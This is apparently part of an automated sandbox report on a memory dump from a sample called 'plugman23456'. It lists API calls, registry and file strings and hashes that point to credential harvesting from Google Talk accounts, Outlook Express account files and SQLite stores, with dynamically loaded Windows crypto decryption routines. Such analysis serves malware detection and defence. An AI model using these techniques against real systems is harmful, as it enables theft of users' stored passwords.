                          • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                          • String ID: Software\Google\Google Talk\Accounts
                          • API String ID: 1366857005-1079885057
                          • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                          • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                          • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                          • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                          APIs
                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                          • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                          • memset.MSVCRT ref: 00410E10
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                          • _mbscpy.MSVCRT ref: 00410E87
                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          • API String ID: 3929982141-2036018995
                          • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                          • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Cursor_mbsicmpqsort
                          • String ID: /nosort$/sort
                          • API String ID: 882979914-1578091866
                          • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                          • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                          • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                          • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                          APIs
                          • memset.MSVCRT ref: 004109F7
                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                            • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                          • memset.MSVCRT ref: 00410A32
                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                          • String ID:
                          • API String ID: 3143880245-0
                          • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                          • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                          • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                          • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                          • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                          APIs
                          • memset.MSVCRT ref: 00402A34
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                          • RegCloseKey.KERNEL32 ref: 00402A95
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Close$Enummemset
                          • String ID:
                          • API String ID: 1615280680-0
                          • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                          • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                          • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                          • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@mallocmemcpy
                          • String ID:
                          • API String ID: 3831604043-0
                          • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                          • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                          • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                          • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                          APIs
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                            • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                          • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: sqlite3.dll
                          • API String ID: 3677997916-1155512374
                          • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                          • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                          • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                          • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                          APIs
                          • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID: eBD
                          • API String ID: 823142352-44267735
                          • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                          • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                          • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                          • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                          APIs
                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                          • _strcmpi.MSVCRT ref: 0040CEC3
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen$_strcmpimemset
                          • String ID: /stext
                          • API String ID: 520177685-3817206916
                          • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                          • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                          • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                          • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                          APIs
                          • memset.MSVCRT ref: 00402B44
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.ADVAPI32 ref: 00402BBD
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                            • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                            • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Closememset$EnumOpenmemcpystrlen
                          • String ID:
                          • API String ID: 1880195650-0
                          • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                          • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                          • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                          • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                          APIs
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                          APIs
                          • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiQueryValueWidememcpystrlen
                          • String ID:
                          • API String ID: 1208763047-0
                          • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                          • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                          • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                          • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                          APIs
                          • memset.MSVCRT ref: 00402ABC
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.ADVAPI32 ref: 00402B17
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                            • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                            • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Closememset$EnumOpen
                          • String ID:
                          • API String ID: 1938129365-0
                          • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                          • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                          • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                          • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
                          APIs
                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                          • LoadLibraryA.KERNEL32(?), ref: 0040473C
                          • GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID:
                          • API String ID: 145871493-0
                          • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                          • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                          • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                          • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                          APIs
                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfile$StringWrite_itoamemset
                          • String ID:
                          • API String ID: 4165544737-0
                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                          APIs
                          • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Enum
                          • String ID:
                          • API String ID: 2928410991-0
                          • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                          • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                          • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                          • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                          APIs
                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: QueryValue
                          • String ID:
                          • API String ID: 3660427363-0
                          • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                          • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                          • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                          • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                          APIs
                          • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                          • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                          • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                          • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                          APIs
                          • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                          • Instruction ID: 388ad9edf2a2a7c68189f8b324949551c1d57bd7625714ace597e57fc5aec2ed
                          • Opcode Fuzzy Hash: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                          • Instruction Fuzzy Hash: 77B09B7681A53096D43577153405BDE135C9FD575474701EBB5043B28545187D4141DD
                          APIs
                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00406D2C
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                          APIs
                          • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                          APIs
                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                          APIs
                          • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                          • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                          • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                          • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                          APIs
                          • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                          • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                          • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                          • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                          • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                          • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                          • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                          • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                          • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                          • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                          • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
